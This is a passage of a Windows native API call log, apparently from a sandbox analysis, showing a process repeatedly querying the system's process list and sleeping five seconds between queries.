BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.970] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.976] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.027] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.036] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.045] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.054] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.069] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.079] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.087] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.088] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.098] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.109] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.136] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.146] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.153] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.161] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.164] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.164] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.168] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.180] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0267.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0267.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0267.187] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0267.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0267.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0267.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0267.189] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, 